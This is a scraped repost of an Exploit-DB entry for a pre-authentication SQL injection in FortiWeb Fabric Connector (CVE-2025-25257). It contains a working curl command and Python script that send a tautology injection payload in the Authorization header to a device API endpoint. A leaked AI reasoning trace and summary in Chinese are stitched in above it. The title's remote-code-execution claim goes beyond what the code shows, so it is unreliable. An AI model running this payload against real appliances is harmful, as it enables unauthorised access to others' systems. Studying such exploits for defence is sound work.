[webapps] FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不需要特定的开头。首先,我得仔细阅读用户提供的文章内容。 文章标题是关于FortiWeb Fabric Connector 7.6.x的一个漏洞,预身份验证SQL注入导致远程代码执行。日期是2025年10月5日,作者是Milad Karimi。测试环境包括Windows和Ubuntu,CVE编号是CVE-2025-25257。 概述部分提到这是一个SQL注入漏洞,影响FortiWeb Fabric Connector 7.0到7.6.x版本。攻击者可以注入恶意SQL命令到API端点,可能导致RCE。 PoC部分提供了一个curl命令和一个Python脚本,展示了如何利用这个漏洞。 现在我需要将这些信息浓缩到100字以内。重点包括漏洞名称、影响版本、攻击类型、可能后果以及PoC的存在。 可能的结构:FortiWeb Fabric Connector 7.6.x存在预身份验证SQL注入漏洞(CVE-2025-25257),允许攻击者注入恶意SQL命令,导致远程代码执行。该漏洞影响7.0至7.6.x版本,并附带PoC代码示例。 检查字数是否在限制内,并确保所有关键点都被涵盖。 </think> FortiWeb Fabric Connector 7.6.x 存在预身份验证 SQL 注入漏洞(CVE-2025-25257),允许攻击者通过恶意 SQL 命令控制 API 端点,进而实现远程代码执行。该漏洞影响 FortiWeb 7.0 至 7.6.x 版本,并附带 PoC 示例代码。 2026-2-4 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:9 收藏

# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL
Injection to Remote Code Execution
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2025-25257

Overview

CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in
Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.
This flaw allows attackers to inject malicious SQL commands into the
vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).


PoC

curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
  https://<fortiweb-ip>/api/fabric/device/status

PoC Python

import requests

def test_sqli(base_url):
    url = f"{base_url}/api/fabric/device/status"
    headers = {
        "Authorization": "Bearer aaa' OR '1'='1"
    }
    try:
        response = requests.get(url, headers=headers, verify=False,
timeout=10)
        print(f"Status code: {response.status_code}")
        print("Response body:")
        print(response.text)
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL
CVE-2025-25257 FortiWeb")
    parser.add_argument("base_url", help="Base URL of FortiWeb (ex:
https://10.0.0.5)")
    args = parser.parse_args()
    test_sqli(args.base_url)
# python3 src/poc.py https://10.0.0.5
            

文章来源: https://www.exploit-db.com/exploits/52473
如有侵权请联系:admin#unsafe.sh